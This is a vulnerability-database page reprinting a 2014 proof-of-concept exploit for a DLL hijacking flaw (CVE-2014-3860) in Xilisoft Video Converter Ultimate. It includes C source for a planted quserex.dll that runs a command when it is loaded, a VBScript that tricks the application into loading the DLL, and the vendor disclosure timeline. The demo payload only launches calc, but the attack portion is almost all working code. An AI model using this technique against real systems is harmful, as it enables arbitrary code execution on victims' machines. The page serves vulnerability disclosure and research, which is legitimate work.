Vulners
Lucene search
Xilisoft Video Converter Ultimate 7.8.1 build-20140505 DLL Hijacking
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll) | 3 Jun 201400:00 | – | zdt |
 | CVE-2014-3860 | 12 Feb 202017:56 | – | cve |
 | CVE-2014-3860 | 12 Feb 202017:56 | – | cvelist |
 | EUVD-2014-3797 | 7 Oct 202500:30 | – | euvd |
 | CVE-2014-3860 | 12 Feb 202018:15 | – | nvd |
 | Design/Logic Flaw | 12 Feb 202018:15 | – | prion |
 | CVE-2014-3860 | 22 May 202506:00 | – | redhatcve |
`/*
* Title: Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll)
* Version: 7.8.1 build-20140505 (Previous versions might be vulnerable)
* Tested on: Windows XP SP2 en
* Vendor: http://www.xilisoft.com/
* Software Link: http://www.xilisoft.com/webapp/downloader.php?product_code=x-video-converter-ultimate7
* Exploit-Author: Osanda Malith Jayathissa
* /!\ Author is not responsible for any damage you cause
* Use this material for educational purposes only
* Twitter: @OsandaMalith
* CVE: CVE-2014-3860
*/
/*
Vulnerable Executables:
1. vcloader.exe
2. vc.exe
3. vc_buy.exe
*/
#include <windows.h>
int pwned()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
pwned();
return 0;
}
/*
As this application as no extensions associated we have to manually a open a file with this application.
So we can automate this process by writting something like this ;) Place the DLL and this script in the
same location. Once the victim runs this script the DLL will be hijacked.
msg=MsgBox ("Automated POC" & chr(13) & "Coded by Osanda Malith", 64, "Xilisoft Video Converter Ultimate Dll Hijacking Exploit")
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg",2,true)
objFileToWrite.WriteLine("POC by Osanda Malith :D")
objFileToWrite.Close
file = "new.jpg"
Set oShell = CreateObject("WScript.Shell")
' Path to Xilisoft Video Converter
oShell.Run """%ProgramFiles%\Xilisoft\Video Converter Ultimate\vcloader.exe """ & file
*/
/* Disclosure Timeline
2014-04-20 : Contacted the vendor
2014-04-23 : Contacted again as I did not recieve any reply
2014-04-24 : Recieved a response saying that it was forwarded to technicians
2014-05-16 : Contacted again since there is was reply
2014-05-20 : Recieved a response saying that they cannot reproduce
2014-06-01 : Contacted MITRE
2014-06-02 : Public disclosure */
//EOF
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.00139